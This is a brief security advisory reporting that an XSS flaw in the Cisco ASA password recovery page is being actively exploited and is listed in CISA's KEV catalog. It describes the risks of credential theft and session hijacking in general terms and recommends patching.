This XSS in the Cisco ASA password recovery page is a long-known vulnerability, but its inclusion in CISA’s KEV (Known Exploited Vulnerabilities) catalog signals active exploitation. Organizations using vulnerable versions of Cisco ASA software are at risk of credential theft or session hijacking. Because the vulnerability is being actively exploited, it poses an immediate threat to system integrity and the protection of sensitive data.
| Product | Cisco ASA |
| Date | 2024-11-14 11:30:09 |
| Information |
|
Technical Summary
A critical cross-site scripting (XSS) vulnerability is currently being actively exploited in the password recovery page of Cisco Adaptive Security Appliance (ASA) software. This vulnerability allows remote attackers to inject arbitrary scripts through improperly filtered hidden input fields. Exploitation of this flaw can lead to the theft of user credentials or user session hijacking, thereby leading to unauthorized access and the potential compromise of sensitive information.
Recommendations
Organizations using Cisco ASA software should immediately update to the latest patched versions to resolve this critical vulnerability.
[Callforaction-THREAT-Footer]